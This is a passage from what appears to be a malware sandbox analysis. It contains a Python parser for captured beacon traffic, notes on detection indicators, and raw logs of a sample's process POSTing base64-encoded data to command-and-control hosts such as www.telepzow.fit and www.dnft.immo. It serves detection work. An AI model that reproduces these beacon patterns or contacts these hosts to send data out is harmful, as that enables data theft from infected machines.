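    param, value = max(fields.items(), key=lambda kv: len(kv[1]))
    blob = base64.b64decode(value, validate=True)
    host = headers.get("host", "")
    return {
        "method": method,
        "host": host,
        "path": path,
        "param": param,
        "payload_len": len(blob),
        "user_agent": headers.get("user-agent", ""),
        "connection_close": headers.get("connection", "").lower() == "close",
        # A real browser form submit percent-encodes '+', '/' and '=' in the body.
        "unescaped_form_body": method == "POST" and any(c in value for c in "+/="),
        # Referer is the beacon URL itself, i.e. no page that could have hosted a form.
        "self_referer": headers.get("referer") == f"http://{host}{path}",
    }


def decode_body(raw: bytes) -> bytes:
    """Undo chunked transfer coding and gzip content coding on a captured reply."""
    _, headers, body = parse_http(raw)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        out, pos = bytearray(), 0
        while True:
            nl = body.index(b"\r\n", pos)
            size = int(body[pos:nl].split(b";")[0], 16)  # chunk-size; extensions ignored
            if size == 0:
                break
            out += body[nl + 2:nl + 2 + size]
            pos = nl + 2 + size + 2  # skip the chunk data and its trailing CRLF
        body = bytes(out)
    if headers.get("content-encoding", "").lower() == "gzip":
        body = gzip.decompress(body)  # verifies the CRC32 and ISIZE trailer
    return body


if __name__ == "__main__":
    for msg in (GET_BEACON, POST_BEACON):
        print(beacon_indicators(msg))
    print(decode_body(POST_REPLY).decode("latin-1"))
```

Run stand-alone it prints both indicator dicts and the decompressed reply. The two GET beacons on this page (sessions 4 and 8) both carry a 120-character value that decodes to 89 bytes, and the first POST carries 145 bytes; the later POSTs (Content-Length 576 and 45184 in sessions 6 and 7) go through the same parser once their full body is available. The reply from www.telepzow.fit inflates to a 153-byte generic HTML 404 page rather than anything that acknowledges the beacon, and www.thesnusgang.fun returned a Hostinger parked-domain page, so neither host in this section is visibly answering the sample; the constant parameter name BTV4RR_, the fixed Firefox 27 on OS X 10.10 User-Agent, Connection: close on every request and the unescaped base64 in a form body are the details worth turning into a network rule.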

                                                      Session ID: 6 | Source IP: 192.168.2.24 | Source Port: 49790 | Destination IP: 172.67.155.214 | Destination Port: 80 | PID: 6880 | Process: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 13:18:45.816857100 CET | 1082 | OUT | POST /oizn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 576
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.telepzow.fit
                                                      Origin: http://www.telepzow.fit
                                                      Referer: http://www.telepzow.fit/oizn/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 6a 53 4c 4c 7a 55 6f 31 4e 74 6b 6f 35 62 6c 75 41 76 67 64 4c 52 6b 59 4f 65 49 78 76 4f 4b 47 59 63 42 6b 55 4c 48 36 72 38 55 45 51 44 6b 7a 42 72 37 47 48 31 63 57 65 47 47 70 4a 72 4e 4a 2b 74 38 63 35 72 47 72 64 63 32 6c 4a 31 70 44 46 46 65 42 4c 41 59 50 73 57 4c 4a 43 6d 72 35 74 5a 7a 62 44 51 71 50 34 41 65 4e 32 48 56 4d 6a 35 6b 49 49 6c 61 71 5a 6f 4d 6a 67 36 67 71 70 38 5a 79 4b 78 75 74 48 47 54 58 31 67 56 51 48 4e 73 57 46 38 71 6a 4c 2b 76 68 37 41 72 41 52 4d 65 30 4c 2b 76 4a 72 74 56 69 6d 6d 51 47 4d 4c 33 55 57 33 34 6f 68 4e 4a 36 71 58 44 33 65 34 35 4a 54 2b 76 67 2b 55 69 6f 6d 33 78 67 34 34 61 57 75 58 32 4a 4c 30 7a 4b 4f 35 74 52 65 41 6a 32 68 38 65 79 68 79 30 6a 42 52 55 68 58 59 4a 51 47 44 36 45 42 53 46 67 4b 62 61 66 6f 79 45 77 78 44 4f 76 79 75 74 52 77 6b 42 52 50 56 43 54 42 70 79 35 39 47 4a 37 4f 48 63 73 44 50 2f 48 6e 51 78 33 56 79 77 77 54 74 57 5a 6f 6c 55 45 64 78 76 6d 69 64 39 50 2f 32 57 32 78 73 75 38 61 79 31 52 56 61 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=jSLLzUo1Ntko5bluAvgdLRkYOeIxvOKGYcBkULH6r8UEQDkzBr7GH1cWeGGpJrNJ+t8c5rGrdc2lJ1pDFFeBLAYPsWLJCmr5tZzbDQqP4AeN2HVMj5kIIlaqZoMjg6gqp8ZyKxutHGTX1gVQHNsWF8qjL+vh7ArARMe0L+vJrtVimmQGML3UW34ohNJ6qXD3e45JT+vg+Uiom3xg44aWuX2JL0zKO5tReAj2h8eyhy0jBRUhXYJQGD6EBSFgKbafoyEwxDOvyutRwkBRPVCTBpy59GJ7OHcsDP/HnQx3VywwTtWZolUEdxvmid9P/2W2xsu8ay1RValC0PLr21+cjb8EUS1phlRuJuIIUeOvlvw5cdSVlX1ljAsRMzmLQC95Uzbysjrp5C9Pzvm6+qhpNCwA90XY7K5xmvXZIKpFGAbaqwrYxYpw5P5e4jl6WV1D7G4m6hNWq738K/4hqkyXO3UP7OpAppg7asF3IFs2NjGaLAX5kQ3zugdtaM1pUjPPr9QO0c1SqB0K290mbb8mSuisYDsjaRb/K6cFzwzBgfcwy67+pJEIwwE=
                                                      Dec 13, 2024 13:18:47.379065037 CET | 924 | IN | HTTP/1.1 404 Not Found
                                                      Date: Fri, 13 Dec 2024 12:18:47 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qO%2BuBPeVrnha5YOePar4qkMlRazE%2BXp%2F%2FKUpLFZs6hYDmoEXNviCHd7y%2F7zBRgCf4V4OOhmThyA6tJT96Xy7mqk%2FXE9UpF0MmWEvj7x5H7Efgv0zB3jaVpTR3dOy6QLVxLdu"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f15e611efe0de99-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1541&rtt_var=770&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=1082&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy0


                                                      Session ID: 7 | Source IP: 192.168.2.24 | Source Port: 49791 | Destination IP: 172.67.155.214 | Destination Port: 80 | PID: 6880 | Process: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 13:18:48.484707117 CET | 12360 | OUT | POST /oizn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 45184
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.telepzow.fit
                                                      Origin: http://www.telepzow.fit
                                                      Referer: http://www.telepzow.fit/oizn/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 6a 53 4c 4c 7a 55 6f 31 4e 74 6b 6f 35 62 6c 75 41 76 67 64 4c 52 6b 59 4f 65 49 78 76 4f 4b 47 59 63 42 6b 55 4c 48 36 72 38 63 45 51 57 77 7a 41 4a 54 47 47 31 63 57 41 57 47 30 4a 72 4e 59 2b 74 6b 59 35 72 36 37 64 65 4f 6c 4b 6d 78 44 47 6e 32 42 63 51 59 4d 76 57 4c 44 4e 47 72 39 74 5a 6a 48 44 51 2f 79 34 44 53 4e 33 31 4e 4d 75 59 6b 4c 4e 6c 61 73 51 49 4d 6f 6b 36 67 32 70 38 4a 32 4b 78 53 74 45 33 76 58 31 69 39 51 48 61 77 57 46 63 71 6a 4e 2b 75 6a 31 51 6d 6d 52 4d 65 34 4c 2b 36 53 72 66 64 69 6c 55 49 47 4d 62 33 62 61 6e 34 69 76 74 4a 34 75 58 43 39 65 34 78 4a 54 2f 66 67 2b 45 61 6f 67 55 31 67 34 59 61 56 6e 33 32 4a 66 6b 7a 45 51 4a 70 77 65 41 6a 68 68 34 6d 49 68 79 67 6a 44 31 41 68 53 71 78 54 41 6a 36 44 43 53 46 36 56 72 61 43 6f 79 41 57 78 41 2b 76 31 65 78 52 77 55 52 52 65 6d 71 53 48 35 79 2b 72 32 4a 6c 42 6e 42 36 44 50 6e 44 6e 52 52 6e 56 69 51 77 54 74 6d 5a 73 6d 4d 45 56 68 76 6d 6b 64 38 4b 79 57 58 64 78 73 75 38 61 78 52 52 56 71 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=jSLLzUo1Ntko5bluAvgdLRkYOeIxvOKGYcBkULH6r8cEQWwzAJTGG1cWAWG0JrNY+tkY5r67deOlKmxDGn2BcQYMvWLDNGr9tZjHDQ/y4DSN31NMuYkLNlasQIMok6g2p8J2KxStE3vX1i9QHawWFcqjN+uj1QmmRMe4L+6SrfdilUIGMb3ban4ivtJ4uXC9e4xJT/fg+EaogU1g4YaVn32JfkzEQJpweAjhh4mIhygjD1AhSqxTAj6DCSF6VraCoyAWxA+v1exRwURRemqSH5y+r2JlBnB6DPnDnRRnViQwTtmZsmMEVhvmkd8KyWXdxsu8axRRVq [TRUNCATED]
                                                      Dec 13, 2024 13:18:48.604996920 CET | 2472 | OUT | Data Raw: 32 56 46 32 4f 39 34 75 41 39 43 63 51 59 43 2b 6b 47 70 4b 71 57 41 39 73 6c 59 36 79 74 51 51 6c 43 6b 79 62 71 79 4c 6d 2f 37 76 65 71 74 7a 37 72 66 75 6f 38 33 49 4d 36 42 42 56 46 2b 77 53 44 72 6d 74 65 31 56 6e 63 52 34 54 58 32 41 62 79
                                                      Data Ascii: 2VF2O94uA9CcQYC+kGpKqWA9slY6ytQQlCkybqyLm/7veqtz7rfuo83IM6BBVF+wSDrmte1VncR4TX2AbyEfG+VeYhirvMcgEJ1gEExjB317tMQ8K5p41pf8ilZynIT+omuD89sBaVjXZi7VaAixvvfiIaRj1jPjKkCT4UABCuVRHFha5wuzB3kOKq3HP+11DiNYDVirOAFfm81LnK7b9k/5bZ48oBzhNt26xmNuflmI2NJDV7V
                                                      Dec 13, 2024 13:18:48.605077028 CET | 7416 | OUT | Data Raw: 35 36 4d 47 53 4b 39 47 31 5a 4a 4c 63 38 4c 58 77 43 70 46 66 38 37 42 65 35 6f 47 67 43 55 4a 51 5a 55 46 61 37 64 77 68 30 52 63 36 33 71 77 38 63 31 4d 7a 4c 31 6d 42 4f 4e 30 74 59 59 53 64 63 74 65 45 55 6c 58 74 53 43 44 47 4e 38 6a 6f 74
                                                      Data Ascii: 56MGSK9G1ZJLc8LXwCpFf87Be5oGgCUJQZUFa7dwh0Rc63qw8c1MzL1mBON0tYYSdcteEUlXtSCDGN8jotXoomYsUeJOOOWi4j+h4rOKPMgLqPMDXmC3UV9Ba9mgAhlRDevUEUN3gthjLq8B0fOQlkj//5EV7DCi2ElixsrE7AqmjLLwEW5SqaflXcFmpHbLK/XcGAlo0CQkINcvh6SIqC1K77p8eUWCAVQTRVepKrz58T9xCN7
                                                      Dec 13, 2024 13:18:48.605110884 CET | 2472 | OUT | Data Raw: 4c 42 63 71 65 50 67 6d 43 2b 6d 68 65 31 39 71 36 56 30 54 58 65 75 72 4b 31 37 6c 58 66 79 70 72 69 56 74 56 34 44 76 2f 6d 46 79 53 6c 74 54 39 42 43 46 32 34 6d 33 57 6b 56 52 66 72 31 51 4c 31 52 31 48 4c 65 56 72 4c 30 30 4a 78 6d 34 50 2f
                                                      Data Ascii: LBcqePgmC+mhe19q6V0TXeurK17lXfypriVtV4Dv/mFySltT9BCF24m3WkVRfr1QL1R1HLeVrL00Jxm4P/YuRrkCAXtecisWopVk8bN2+ccpaRCzvr4HV2bdx21vPsxmziKpxPB5uvW5W30r8y8kQQkvHzcP01vqXJ033JOJpKv3n32LCKGUIC5gzSPpv0Sh+jhfD6fA41Bh1UzIO2Ml0CHQLOgAgb+PTCbimm9mxpalbv/DOZu
                                                      Dec 13, 2024 13:18:48.605125904 CET | 2472 | OUT | Data Raw: 2f 2f 76 32 65 56 36 34 36 32 71 7a 77 49 6e 70 43 68 58 76 39 63 61 66 6c 73 68 2f 46 4f 55 42 62 41 70 74 68 50 44 56 37 35 79 70 6c 78 35 53 68 79 38 33 57 6c 76 59 36 67 2b 70 64 47 47 36 2b 41 59 42 4d 37 49 79 45 31 57 7a 62 37 46 34 62 68
                                                      Data Ascii: //v2eV6462qzwInpChXv9caflsh/FOUBbApthPDV75yplx5Shy83WlvY6g+pdGG6+AYBM7IyE1Wzb7F4bhasMz1W+u/DBGjAaBUneaipD6fsHnOb9zcwPaG+IO0+f/4EghyOUCBx73Yg2MMwcAlEBtddzqxK7xDtWSVjNpAjx+Neytm9oKjcDP4lP1XWsat1taKp6gGKu/FadaqlOvG2pBRMUabkMyE0aGxn+aHPmx5tdAzmy/S
                                                      Dec 13, 2024 13:18:48.605155945 CET | 2472 | OUT | Data Raw: 35 36 61 79 4c 47 43 38 6d 58 4e 55 43 34 63 35 4e 30 42 41 43 77 50 4b 75 49 68 4c 4c 62 66 66 66 74 6a 35 79 56 42 72 5a 73 2f 42 76 30 41 48 66 50 4a 33 49 49 36 46 61 44 49 70 6d 2b 6d 34 73 63 63 54 4b 37 4e 79 6f 46 30 42 66 32 47 65 43 7a
                                                      Data Ascii: 56ayLGC8mXNUC4c5N0BACwPKuIhLLbffftj5yVBrZs/Bv0AHfPJ3II6FaDIpm+m4sccTK7NyoF0Bf2GeCzxUZBBOxUoIdiECrUzX5HZJS6ouTQtoV8EW7bkOEuWRGuEsVqcGO/Sf5eo0Ojt9lEwSEMG/2Z78CjzLMHqMw61j1s9xC5tl0sS/F5E08/hE5yXXBRXgiqpTtFQkDNaxWhJogSaY9/dIOfjPfqvb3PKB5BFchQQHKoC
                                                      Dec 13, 2024 13:18:48.605221987 CET | 2472 | OUT | Data Raw: 5a 39 38 73 61 55 33 38 59 78 36 5a 49 42 73 42 76 41 46 4e 51 37 78 61 54 4b 63 72 58 58 78 31 61 35 59 77 57 47 67 39 64 70 75 6e 6e 6b 62 79 64 2f 58 65 53 4c 4a 51 59 4c 61 76 34 46 45 4e 78 4d 4a 6e 35 71 36 77 33 39 32 57 64 47 6b 54 77 4e
                                                      Data Ascii: Z98saU38Yx6ZIBsBvAFNQ7xaTKcrXXx1a5YwWGg9dpunnkbyd/XeSLJQYLav4FENxMJn5q6w392WdGkTwNxUkDqyCR5eoWwgpqQ+pVKm4waKYByk3TWodMxR5CB9gZHD7UFAiVFVREvy+WtUJhICV2bmB6QvH3N7Tn88cs0bX6HgYZzLQxZMUZHAuBiaaRBT9JWx6A2UIMxvVxAusaVSaZ9elZrV238ICS9c+m+iTJudCHr2QC1
                                                      Dec 13, 2024 13:18:48.605237007 CET | 2472 | OUT | Data Raw: 4c 30 48 42 2f 63 6a 6f 2b 55 6c 65 35 79 46 62 4a 6c 41 6b 30 68 57 4b 56 2b 34 4a 33 65 66 6b 5a 30 73 78 47 48 75 35 76 69 6d 64 30 4d 49 67 4d 76 4e 73 59 65 31 37 44 4d 41 4f 44 57 57 37 73 74 52 55 47 7a 41 30 41 42 53 2b 69 73 57 45 65 31
                                                      Data Ascii: L0HB/cjo+Ule5yFbJlAk0hWKV+4J3efkZ0sxGHu5vimd0MIgMvNsYe17DMAODWW7stRUGzA0ABS+isWEe1W4PPazkQ00TmYjs8aVbR/IlV8Wc6qAIgiJMH+9Cj6HRHvf58XchK8awprovC4psFt9gvPr6z+Z3MuqE4HOTYhc9w9D6aE9Im5J8hfa0hcRB/od5I0BjS/HkFOj1+Ie65HpCn4UhmgeA1OwEA/mA8LNSgCWdzkL/CS
                                                      Dec 13, 2024 13:18:48.605261087 CET | 2472 | OUT | Data Raw: 36 41 33 52 6b 2f 4d 35 35 46 69 78 76 74 67 31 77 4d 4e 57 66 35 4b 63 64 57 70 33 59 74 79 74 37 6b 58 4e 70 50 4a 37 43 38 35 48 51 52 55 31 30 51 2f 51 4a 4a 73 39 53 4f 65 72 48 6c 70 71 54 4c 55 63 48 2f 38 6e 73 77 59 4f 72 4b 38 77 50 30
                                                      Data Ascii: 6A3Rk/M55Fixvtg1wMNWf5KcdWp3Ytyt7kXNpPJ7C85HQRU10Q/QJJs9SOerHlpqTLUcH/8nswYOrK8wP0IpsbJV0n43/EaRUF7J/PI6mwIusgQP2rUYBqKuQkpHFB1c5YvBZkx9PgUnVkb5ELOPJSGYmEnyxkEEp2pCrRCroH+coazqRdUsCaCKeT+AjIOpdldZEaQpGYfLQxaQ08HNo1GlKiMqyiSOtED+mSkYiYPqB4z+whT
                                                      Dec 13, 2024 13:18:48.725356102 CET | 2472 | OUT | Data Raw: 51 4c 4c 57 6c 52 52 6c 6e 37 51 70 39 67 4d 69 71 70 49 70 43 48 48 6f 76 6b 50 34 47 64 70 59 79 45 49 76 49 75 50 75 4a 38 66 77 2f 42 39 72 57 4e 57 42 73 48 47 62 6f 6b 49 69 50 2f 4d 4c 55 58 63 7a 5a 70 44 4b 6d 5a 34 6d 50 32 64 52 76 30
                                                      Data Ascii: QLLWlRRln7Qp9gMiqpIpCHHovkP4GdpYyEIvIuPuJ8fw/B9rWNWBsHGbokIiP/MLUXczZpDKmZ4mP2dRv0JBzk+iVrU9VBIn5kwjsYCOxjunUKglfbvs0W9gAE1NIiUiQVN+orUKbNM4EAFof8zOkPx1fbgR0oCFiGtGUi8RptHfv1pD0aNbmE23PAHiKJV6XSCci51WM1MliLGBYjHiSVdZPzDoTz6CGLQrGPEqSd9DeipFKrE
                                                      Dec 13, 2024 13:18:48.725547075 CET | 6147 | OUT | Data Raw: 7a 41 66 66 74 76 39 59 61 50 42 38 44 70 75 38 36 79 52 79 5a 55 5a 79 6e 71 4d 66 43 5a 2f 4a 70 55 72 78 36 36 5a 39 74 71 31 36 49 54 54 6b 58 59 53 69 64 68 31 71 67 70 69 2f 57 78 69 51 36 52 47 4c 49 69 5a 70 53 76 6d 6c 44 6b 68 46 49 54
                                                      Data Ascii: zAfftv9YaPB8Dpu86yRyZUZynqMfCZ/JpUrx66Z9tq16ITTkXYSidh1qgpi/WxiQ6RGLIiZpSvmlDkhFIT/hIym0S2f0S/hAZF56FPoWIQBonpL6YDGGbQG2pgA4+h/1JNsggecVPY9ueJGR+CM93DlEMZHJy5wM5ApJXnk1zghVnzHBNIG9nEK7NYz0n0HBSVD6ATvwPShmQg3k8DeSXONqBvYGqsLBjNOOhBxstjlKyrhcEIu


                                                      Session ID: 8 | Source IP: 192.168.2.24 | Source Port: 49792 | Destination IP: 172.67.155.214 | Destination Port: 80 | PID: 6880 | Process: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 13:18:51.145190001 CET | 440 | OUT | GET /oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.telepzow.fit
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Dec 13, 2024 13:18:52.731097937 CET | 934 | IN | HTTP/1.1 404 Not Found
                                                      Date: Fri, 13 Dec 2024 12:18:52 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6vOCY2UsXyGnBoOqK6hB8vtFXVPltGmT3FfWL4dzuAzMxbCVO%2FW70q7dF%2FjIm8K4HVio%2B2nZ3dm1UgDmGdmpkcX3T%2BIM%2B1OCOBpAwE5TPZNGD3MqXuDnHdJAih0CTvXGK7x"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f15e6336e4c43bb-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=440&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.27.2</center></body></html>0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.24 | 49793 | 199.59.243.227 | 80 | 6880 | C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 13:18:58.996330023 CET | 701 | OUT | POST /yeky/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 204
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.dnft.immo
                                                      Origin: http://www.dnft.immo
                                                      Referer: http://www.dnft.immo/yeky/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Ascii: BTV4RR_=2NeWI1jcYlDHxUAt8JOrAfvzbYwcRnYiUTihzds1PMtWmtZQbBUeny9QxC0/wjpnMnfEQQEmspLoTYMyUM2IF1u6NpciWD9ZI7CicHgr4vDaRCmOTHXIYm09bv+XC7525np50DZvP1lq6+EMJvQcGOsLil+NRwI3iVZVVlAQNduwneOaVAU1KFjM72vF2k3BJQ==
                                                      Dec 13, 2024 13:19:00.074666977 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:18:59 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1102
                                                      x-request-id: a5c2cc54-99f2-4dc1-aea4-5f76263d33cf
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                      set-cookie: parking_session=a5c2cc54-99f2-4dc1-aea4-5f76263d33cf; expires=Fri, 13 Dec 2024 12:33:59 GMT; path=/
                                                      connection: close
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:00.074754000 CET | 555 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVjMmNjNTQtOTlmMi00ZGMxLWFlYTQtNWY3NjI2M2QzM2NmIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.24 | 49794 | 199.59.243.227 | 80 | 6880 | C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 13:19:01.662595987 CET | 1073 | OUT | POST /yeky/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 576
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.dnft.immo
                                                      Origin: http://www.dnft.immo
                                                      Referer: http://www.dnft.immo/yeky/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 32 4e 65 57 49 31 6a 63 59 6c 44 48 7a 31 77 74 77 4b 32 72 56 76 76 77 52 34 77 63 66 48 59 63 55 53 65 68 7a 63 6f 62 50 65 4a 57 6d 4d 70 51 61 45 6f 65 67 79 39 51 2b 69 30 41 76 7a 6f 6c 4d 67 58 36 51 53 41 6d 73 6f 72 6f 52 71 45 79 44 38 32 58 4c 31 75 2f 61 5a 63 52 50 7a 39 74 49 37 44 33 63 48 68 73 34 76 58 61 66 6a 47 4f 57 30 50 49 59 6d 30 37 64 66 2b 36 51 4c 35 66 35 6e 52 6c 30 43 55 33 50 77 6c 71 35 65 6b 4d 43 50 51 44 42 75 73 48 71 46 2f 2f 59 43 4d 39 6b 6e 51 69 58 6b 41 5a 4f 38 47 6f 37 74 6d 38 4e 67 41 39 4f 57 36 48 2b 7a 65 30 31 55 79 75 63 7a 4e 69 39 6c 56 6e 4a 32 49 56 70 49 72 2b 6b 4d 33 61 42 38 6e 6e 6c 7a 67 73 6f 5a 56 6f 6e 4a 52 62 70 43 78 6c 33 79 54 6c 68 54 41 2f 71 41 45 4f 6f 7a 30 38 73 74 62 75 62 56 2b 58 70 52 6c 77 6d 63 72 49 31 69 4d 4e 6a 31 38 6f 70 55 36 45 68 6a 69 6e 49 63 69 6b 43 4c 73 50 32 6d 36 2b 61 35 39 78 7a 41 77 61 65 42 37 52 72 53 6f 4d 6d 2b 74 66 38 46 61 48 63 6a 77 39 51 47 62 34 39 38 71 75 48 49 [TRUNCATED]
                                                      Dec 13, 2024 13:19:02.747889042 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:01 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1102
                                                      x-request-id: fd90465b-ca5e-4736-958b-cd3e36228181
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
